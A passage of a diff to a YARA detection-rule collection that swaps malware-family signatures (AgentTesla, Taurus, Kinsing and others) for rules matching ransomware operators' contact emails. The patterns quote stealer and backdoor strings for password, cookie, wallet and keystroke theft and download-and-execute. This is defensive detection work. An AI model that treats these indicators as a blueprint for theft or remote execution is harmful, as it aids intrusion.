"https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "49f3f5a88212d4bed1f0237a4437fb537e84cd6dd26c5fe224250f3b6e39d384" score = 75 - quality = 75 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "system32\\sysvols\\" ascii nocase - $s2 = "Sysnative\\sysvols\\" ascii nocase - $s3 = "critical.log" fullword ascii - $s4 = "log.log" fullword ascii - $s5 = "commands.txt" fullword ascii - $s6 = "_EV0LuTi0N_" ascii - $s7 = /(file|reg)\scmd:/ fullword ascii - $s8 = "dumper_nologs_" ascii - $s9 = "ReflectiveLoader" ascii + $s1 = "rscl@dr.com" ascii wide nocase + $s2 = "rscl@usa.com" ascii wide nocase condition: - uint16(0)==0x5a4d and 6 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Blackshadesrat : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeoticus { meta: - description = "BlackshadesRAT / Cambot POS payload" - author = "ditekSHen" - id = "bd0ad920-109a-50b5-94af-6580684bff52" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Zeoticus ransomware" + author = "ditekShen" + id = "4d5f0d6d-f792-563d-9a9b-1986f5af8743" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1285-L1300" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5c2a76ce52bce9c37a3518ff459011acb733c2c5abac74786e41a1c169459ce2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L226-L235" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7a83b15b0c8e81f67d11f8b5d9a43ba4e1e3a0f6741ddd0daafe4e742dd91cd8" score = 75 - quality = 75 - tags = "FILE" - snort_sid = "920208-920210" + quality = 71 + tags = "" strings: - $s1 = "bhookpl.dll" fullword wide - $s2 = "drvloadn.dll" fullword wide - $s3 = "drvloadx.dll" fullword wide - $s4 = "SPY_NET_RATMUTEX" fullword wide - $s5 = "\\dump.txt" fullword wide - $s6 = "AUTHLOADERDEFAULT" fullword wide - $pdb = "*\\AC:\\Users\\Admin\\Desktop_old\\Blackshades project\\bs_bot\\bots\\bot\\bs_bot.vbp" fullword wide + $s1 = "anobtanium@tutanota.com" ascii wide nocase + $s2 = "anobtanium@cock.li" ascii wide nocase condition: - uint16(0)==0x5a4d and (4 of ($s*) or ($pdb and 2 of ($s*))) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Goldenspy : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Jobcryptor { meta: - description = "GoldenSpy dropper payload" - author = "SpiderLabs Trustwave" - id = "01d3f14a-fefb-5cea-b055-d7e9f4c7d13b" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1302-L1314" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "908047db2167733da0089375dbfd636881e721cc219da110755b81581d438cfa" + description = "Detects files referencing identities associated with JobCryptor ransomware" + author = "ditekShen" + id = "406f5638-883b-57a4-a2ba-532d2bd3ae83" + date = "2024-01-23" + modified = "2024-01-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L237-L247" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c8c5dcc0d7484a3ac6e702cca8bd0907f9e4f4aea5e99c4c3f988389e0d803a7" score = 75 - quality = 67 - tags = "FILE" + quality = 69 + tags = "" strings: - $reg = "Software\\IDG\\DA" nocase wide ascii - $str1 = "requestStr" nocase wide ascii - $str2 = "nb_app_log_mutex" nocase wide ascii - $str3 = { 510F4345[0-10]50518D8DCCFE[0-20]837D1C[0-20]8D45[0-15]0F4345[0-20]505157 } + $s1 = "olaggoune235@protonmail.ch" ascii wide nocase + $s2 = "ouardia11@tutanota.com" ascii wide nocase + $s3 = "laggouneo11@gmail.com" ascii wide nocase condition: - ( uint16(0)==0x5A4D) and $reg and 2 of ($str*) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Plurox : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cuba { meta: - description = "Plurox backdoor payload" - author = "ditekSHen" - id = "c8a97132-c1d5-5456-a055-d46a9399dbdd" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with JobCryptor ransomware" + author = "ditekShen" + id = "5eea027d-2164-54f2-a2bf-74b5d532e610" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1316-L1328" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c2ec2ce7a9210d8eebb06c755eab51cab93fe6d48d737fd1756ffe42d46b35d1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L249-L261" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b734199c8593c338c803518b2729e9d9ceaaed5d21585a3d299885433d8f796e" score = 75 - quality = 75 - tags = "FILE" + quality = 65 + tags = "" strings: - $s1 = "autorun.c" fullword ascii - $s2 = "launcher.c" fullword ascii - $s3 = "loader.c" fullword ascii - $s4 = "stealth.c" fullword ascii - $s5 = "RunFromMemory" fullword ascii + $s1 = "helpadmin2@protonmail.com" ascii wide nocase + $s2 = "helpadmin2@cock.li" ascii wide nocase + $s3 = "mfra@cock.li" ascii wide nocase + $s4 = "admin@cuba-supp.com" ascii wide nocase + $s5 = "cuba_support@exploit.im" ascii wide nocase condition: - uint16(0)==0x5a4d and all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Avalon : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Hello { meta: - description = "Avalon infostealer payload" - author = "ditekSHen" - id = "3de01419-9f45-5d82-8391-2e1e41df2b34" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Hello / WickrMe ransomware" + author = "ditekShen" + id = "02bbaa61-7ea3-5edd-8b38-27ef1f6ee1e2" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1330-L1359" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1aa9dc09ec4c8962dee0455dd367e32139e4c03f1b306f17ac6e82d71aacf713" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L263-L277" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "dfafb0323a50891c03c4b706d4f3a6a511cecdee2448c1f554b416ba1e3d3df9" score = 75 - quality = 75 - tags = "FILE" + quality = 61 + tags = "" strings: - $s1 = "Parsecards" fullword ascii - $s2 = "Please_Gofuckyouself" fullword ascii - $s3 = "GetDomainDetect" fullword ascii - $s4 = "GetTotalCommander" fullword ascii - $s5 = "KnownFolder" fullword ascii - $s6 = "set_hidden" fullword ascii - $s7 = "set_system" fullword ascii - $l1 = "\\DomainDetect.txt" wide - $l2 = "\\Grabber_Log.txt" wide - $l3 = "\\Programs.txt" wide - $l4 = "\\Passwords_Edge.txt" wide - $l5 = "\\KL.txt" wide - $w1 = "dont touch" fullword wide - $w2 = "Grabber" fullword wide - $w3 = "Keylogger" fullword wide - $w4 = "password-check" fullword wide - $w5 = "H4sIAAAAAAAEA" wide - $p1 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide - $p2 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide + $s1 = "emming@tutanota.com" ascii wide nocase + $s2 = "ampbel@protonmail.com" ascii wide nocase + $s3 = "asauribe@tutanota.com" ascii wide nocase + $s4 = "candietodd@tutanota.com" ascii wide nocase + $s5 = "kellyreiff@tutanota.com" ascii wide nocase + $s6 = "kevindeloach@protonmail.com" ascii wide nocase + $s7 = "sheilabeasley@tutanota.com" ascii wide nocase condition: - uint16(0)==0x5a4d and 8 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Linux_Kinsing : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Unlockyourfiles { meta: - description = "Kinsing RAT payload" - author = "ditekSHen" - id = "b13d2c36-c8d3-5138-9e9a-8b5390a93c8d" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with UnlockYourFiles ransomware" + author = "ditekShen" + id = "fdc3ec49-66cc-5a0b-87a6-3660dd6f3b72" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1361-L1376" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "566eb7d1864e3a8088ad4f5d032d6d62a33080bbfc5c20c2520315cfc8146afc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L279-L288" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a33dae7f08eb0c2415fbfdadf2cbbf90c68bc802352277422c6d0a2dbd62cd82" score = 75 - quality = 75 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "backconnect" ascii - $s2 = "connectForSocks" ascii - $s3 = "downloadAndExecute" ascii - $s4 = "download_and_exec" ascii - $s5 = "masscan" ascii - $s6 = "UpdateCommand:" ascii - $s7 = "exec_out" ascii - $s8 = "doTask with type %s" ascii + $s1 = "4lok3r@tutanota.com" ascii wide nocase + $s2 = "4lok3r@protonmail.com" ascii wide nocase condition: - uint16(0)==0x457f and 6 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Avaddon : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Darkside { meta: - description = "Avaddon ransomware payload" - author = "ditekSHen" - id = "d5618c8a-17b7-5009-9947-a6462ad2a4af" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with DarkSide ransomware" + author = "ditekShen" + id = "7b29b9b9-4657-551e-b770-880a2278ef60" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1378-L1395" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fc3032572d2ab2550d3dde738a3d403459da9b5b640acc814596d958b83620bf" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L290-L299" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3c6cdb15cad19f1db38c0fe03ecb24d5cd4861a699aa2bee0f99b8dddacc8bd1" score = 75 - quality = 75 - tags = "FILE" + quality = 73 + tags = "" + hash1 = "bafa2efff234303166d663f967037dae43701e7d63d914efc8c894b3e5be9408" strings: - $s1 = "\\IMAGEM~1.%d\\VISUA~1\\BIN\\%s.exe" ascii - $s2 = "\\IMAGEM~1.%.2d-\\VISUA~1\\BIN\\%s.exe" ascii - $s3 = "\\IMAGEM~1.%d-Q\\VISUA~1\\BIN\\%s.exe" ascii - $s4 = "\\IMAGEM~1.%d\\%s.exe" ascii - $s5 = "EW6]>mFXDS?YBi?W5] CY 4Z8Y BY7Y BZ8Z CY7Y AY8Z CZ8Y!Y:Z" ascii - $s6 = "FY AY 'Z ;W @Y @Y 'Z Y @Y (Z" ascii - $s7 = "\"rcid\":\"" fullword ascii - $s8 = "\"ip\":\"" fullword ascii wide - $s9 = ".?AUANEventIsGetExternalIP@@" fullword ascii - $s10 = ".?AUANEventGetCpuMax@@" fullword ascii + $s1 = "breathcojunktab1987@yahoo.com" ascii wide nocase condition: - uint16(0)==0x5a4d and 8 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Prolock : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Spyro { meta: - description = "ProLock ransomware payload" - author = "ditekSHen" - id = "88fa19ba-238c-5d4d-bf0c-d421ee2ecf1d" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Spyro ransomware" + author = "ditekShen" + id = "9a42a9fd-dfaf-5719-acae-e7c3b92ecdc9" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1397-L1413" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b7d2cc71acc4f643a86781d957afcf5203a2f4034b9ca7da93e8227ddee79f3b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L301-L310" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b12b24b7b1b9800d249fd322532d957ddfc020c495ca89414d8d7e9fa7d58eb7" score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.ProLock" + quality = 71 + tags = "" strings: - $s1 = ".flat" fullword ascii - $s2 = ".data" fullword ascii - $s3 = ".api" fullword ascii - $s4 = "RtlZeroMemory" fullword ascii - $s5 = "LoadLibraryA" fullword ascii - $s6 = "Sleep" fullword ascii - $s7 = "lstrcatA" fullword ascii - $s8 = { 55 89 E5 8B 45 08 EB 00 89 45 EC 8D 15 4F 10 40 00 8D 05 08 10 40 00 83 E8 08 29 C2 8B 45 EC 01 C2 31 } + $s1 = "blackspyro@tutanota.com" ascii wide nocase + $s2 = "blackspyro@mailfence.com" ascii wide nocase condition: - uint16(0)==0x5a4d and all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Purplewave : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryzerlo { meta: - description = "PurpleWave infostealer payload" - author = "ditekSHen" - id = "6f978190-4b4d-5346-9218-0c9104254b45" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Ryzerlo / HiddenTear / RSJON ransomware" + author = "ditekShen" + id = "1e8b79dc-4a81-5126-a7a3-ad7a2e8f62bf" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1415-L1432" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "98dca005d2fdf7eea89661e162292451b544847a7f8b63c8c25c82241ec8e04a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L312-L320" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2d925cac74411c3e408d674e27a27ae029d39977026a79df8f90edae345a31db" score = 75 - quality = 25 - tags = "FILE" + quality = 73 + tags = "" strings: - $s1 = "/loader/" fullword ascii - $s2 = "\\load_" fullword wide - $s3 = "boundaryaswell" fullword ascii - $s4 = "[passwords]" ascii - $s5 = "[is_encrypted]" ascii - $s6 = "[cookies]" ascii - $s7 = ".?AVMozillaBrowser@@" fullword ascii - $s8 = ".?AVChromeBrowser@@" fullword ascii - $s9 = ".?AV?$money" ascii - $s10 = "at t.me/LuckyStoreSupport" ascii + $s1 = "darkjon@protonmail.com" ascii wide nocase condition: - uint16(0)==0x5a4d and 7 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Java_Pyrogenic +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_PYSA { meta: - description = "Pyrogenic/Qealler infostealer payload" - author = "ditekSHen" - id = "2b9268f0-2f73-51ad-ab72-9289e42e5bb1" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with PYSA / Mespinoza ransomware" + author = "ditekShen" + id = "b26d472b-c94e-576d-b168-6f273bb8fca5" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1434-L1446" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bb8cb939f06a376f72dcbbb1f04ec34526f72c3bcc3b146b905a8466826d2c24" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L322-L340" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cf0fbc0160f1d21efdb4a6935ae0d2206107042e3d020722f50d2c302aff246c" score = 75 - quality = 75 + quality = 55 tags = "" strings: - $s1 = "bbb6fec5ebef0d93" ascii wide - $s2 = "2a898bc98aaf6c96f2054bb1eadc9848eb77633039e9e9ffd833184ce553fe9b" ascii wide - $s3 = "addShutdownHook" ascii wide - $s4 = "obfuscated/META-INF/QeallerV" ascii wide - $s5 = "globalIpAddress" ascii wide + $s1 = "luebegg8024@onionmail.org" ascii wide nocase + $s2 = "mayakinggw3732@onionmail.org" ascii wide nocase + $s3 = "lauriabornhat7722@protonmail.com" ascii wide nocase + $s4 = "DeborahTrask@onionmail.org" ascii wide nocase + $s5 = "AlisonRobles@onionmail.org" ascii wide nocase + $s6 = "NatanSchultz67@protonmail.com" ascii wide nocase + $s7 = "jonikemppi@onionmail.org" ascii wide nocase + $s8 = "lanerosalie49003@onionmail.org" ascii wide nocase + $s9 = "bernalmargaret645@onionmail.org" ascii wide nocase + $s10 = "carlhubbard2021@protonmail.com" ascii wide nocase + $u1 = "http://pysa2bitc" ascii wide condition: - all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Agentteslav3 : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ranzylocker { meta: - description = "AgentTeslaV3 infostealer payload" - author = "ditekSHen" - id = "c44c69dd-5e95-595c-88c7-89e243648198" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with RanzyLocker ransomware" + author = "ditekShen" + id = "33478dc4-c0ec-5cc8-8620-79e770f6a773" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1448-L1481" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6c62b2f601eba3c83b60f7f6dbd3d0ec3c01af30f4312df897bb5e902c36fdac" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L354-L363" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "dc345257a3cca82a95e20505c94e90d8ac42240e1491ea1f34be121871673e26" score = 75 - quality = 73 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "get_kbok" fullword ascii - $s2 = "get_CHoo" fullword ascii - $s3 = "set_passwordIsSet" fullword ascii - $s4 = "get_enableLog" fullword ascii - $s5 = "bot%telegramapi%" wide - $s6 = "KillTorProcess" fullword ascii - $s7 = "GetMozilla" ascii - $s8 = "torbrowser" wide - $s9 = "%chatid%" wide - $s10 = "logins" fullword wide - $s11 = "credential" fullword wide - $s12 = "AccountConfiguration+" wide - $s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide - $g1 = "get_Clipboard" fullword ascii - $g2 = "get_Keyboard" fullword ascii - $g3 = "get_Password" fullword ascii - $g4 = "get_CtrlKeyDown" fullword ascii - $g5 = "get_ShiftKeyDown" fullword ascii - $g6 = "get_AltKeyDown" fullword ascii - $m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii - $m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii - $m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii - $m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii - $m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii + $s1 = "eviluser@tutanota.com" ascii wide nocase + $s2 = "evilpr0ton@protonmail.com" ascii wide nocase condition: - ( uint16(0)==0x5a4d and (8 of ($s*) or (6 of ($*) and all of ($g*)))) or (2 of ($m*)) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Taurus : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alkhal { meta: - description = "Taurus infostealer payload" - author = "ditekSHen" - id = "c02114c1-9c97-5d0c-b7ce-1bd6a00a9e9a" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with AlKhal ransomware" + author = "ditekShen" + id = "32e14a6e-fc2e-5c0a-b8e3-33e219923d90" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1483-L1519" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6039c27e69b47dfcc1327c34306627d2d9bd57f6bd365bb80b47ad21f892ae8a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L365-L374" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bd2d66a9cd33ab15b451158cd6c0e6579735653611ee2e6c8045a5807091938d" score = 75 - quality = 73 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "t.me/taurus_se" ascii - $s2 = "rus_seller@explo" ascii - $s3 = "/c timeout /t 3 & del /f /q" ascii - $s4 = "MyAwesomePrefix" ascii - $txt1 = "LogInfo.txt" fullword ascii - $txt2 = "Information.txt" fullword ascii - $txt3 = "General\\passwords.txt" fullword ascii - $txt4 = "General\\forms.txt" fullword ascii - $txt5 = "General\\cards.txt" fullword ascii - $txt6 = "Installed Software.txt" fullword ascii - $txt7 = "Crypto Wallets\\WalletInfo.txt" fullword ascii - $txt8 = "cookies.txt" fullword ascii - $url1 = "/cfg/" wide - $url2 = "/loader/complete/" wide - $url3 = "/log/" wide - $url4 = "/dlls/" wide - $upat = /\.exe;;;\d;\d;\d\]\|\[http/ - $x1 = "Vaultcli.dll" fullword ascii - $x2 = "Bcrypt.dll" fullword ascii - $x3 = "*.localstor" ascii - $x4 = "operator<=>" fullword ascii - $x5 = ".data$rs" fullword ascii - $x6 = "https_discordap" ascii - $o1 = { 53 56 8b 75 08 8d 85 64 ff ff ff 57 6a ff 6a 01 } - $o2 = { 6a 00 68 00 04 00 00 ff b5 a8 fe ff ff ff b5 ac } - $o3 = { ff 75 0c 8d 85 44 ff ff ff 50 e8 aa f7 ff ff 8b } - $o4 = { 8b 47 04 c6 40 19 01 8d 85 6c ff ff ff 8b 0f 50 } - $o5 = { 8d 8d ?? ff ff ff e8 5b } + $s1 = "alkhal@tutanota.com" ascii wide nocase + $s2 = "cyrilga@tutanota.com" ascii wide nocase condition: - ((3 of ($s*) or (6 of ($txt*) and 2 of ($s*)) or ($upat and 1 of ($s*) and 2 of ($txt*)) or ( all of ($url*) and (2 of ($txt*) or 1 of ($s*)))) or ( uint16(0)==0x5a4d and all of ($x*) or ( all of ($o*) and 3 of ($x*)))) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Remoteutilitiesrat : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_DECAF { meta: - description = "RemoteUtilitiesRAT RAT payload" - author = "ditekSHen" - id = "1cf3ece1-e723-5302-9673-273381ba7a8b" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with DECAF ransomware" + author = "ditekShen" + id = "24422015-56f3-503e-a902-0183eb601b22" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1521-L1537" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "179a559f6a6ffbce31595bd613d338bb6ac40b8a083ed0169cde754b6ed756c7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L376-L408" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8fca3a6564cd11e625b65e7f0f278b79678368dd0c77440e9f8d46035e0c3426" score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.RemoteUtilitiesRAT" + quality = 73 + tags = "" strings: - $s1 = "rman_message" wide - $s2 = "rms_invitation" wide - $s3 = "rms_host_" wide - $s4 = "rman_av_capture_settings" wide - $s5 = "rman_registry_key" wide - $s6 = "rms_system_information" wide - $s7 = "_rms_log.txt" wide - $s8 = "rms_internet_id_settings" wide + $s1 = "22eb687475f2c5ca30b@protonmail.com" ascii wide nocase + $s2 = { 4d 49 49 42 43 67 4b 43 41 51 45 41 71 34 6b 31 + 48 64 62 31 54 48 72 7a 42 42 65 4f 31 38 34 6b + 6e 43 62 42 4b 72 30 33 61 70 66 58 71 6c 4f 6b + 53 64 74 48 53 4a 67 66 79 49 71 4a 50 47 78 6c + 0a 2f 63 46 69 73 4a 6d 56 58 52 33 2f 74 34 65 + 39 46 62 4c 73 45 49 75 54 70 39 50 4a 54 63 69 + 6f 6d 48 66 72 35 43 67 43 51 7a 68 6e 41 5a 30 + 41 76 6a 47 42 61 57 50 36 4b 70 43 79 66 44 6e + 73 0a 79 62 72 75 79 4b 71 79 67 61 57 70 5a 53 + 41 6e 7a 52 64 42 2b 54 41 6b 75 35 69 71 79 38 + 71 31 56 77 6e 4e 35 37 51 42 6c 74 72 6f 30 59 + 4a 5a 38 65 6e 4b 5a 52 54 6c 63 7a 6d 74 6a 65 + 4f 70 0a 42 2f 78 75 54 4f 75 44 6a 6d 55 53 4e + 69 47 79 69 6a 57 42 56 66 59 6b 37 73 56 58 6c + 2f 6c 51 38 74 61 58 72 33 36 78 50 57 68 4d 49 + 47 30 45 71 52 56 72 46 56 2b 63 61 76 53 37 5a + 34 76 61 0a 79 58 6d 63 66 35 35 4e 6b 70 4d 47 + 4b 4b 59 38 75 71 76 77 62 34 61 4c 49 4b 61 62 + 65 6b 32 6e 55 57 42 67 4e 67 53 4f 74 71 42 4c + 4c 4c 32 41 32 62 59 2f 35 73 30 47 4a 2f 56 56 + 2b 45 6d 49 0a 58 37 2f 7a 49 2b 46 63 65 55 2b + 64 63 4e 58 2f 69 72 30 75 6a 50 34 79 73 34 6d + 2f 6a 6a 5a 44 34 77 49 44 41 51 41 42 } condition: - uint16(0)==0x5a4d and 4 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Slothfulmedia : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Babuk { meta: - description = "SlothfulMedia backdoor payload" - author 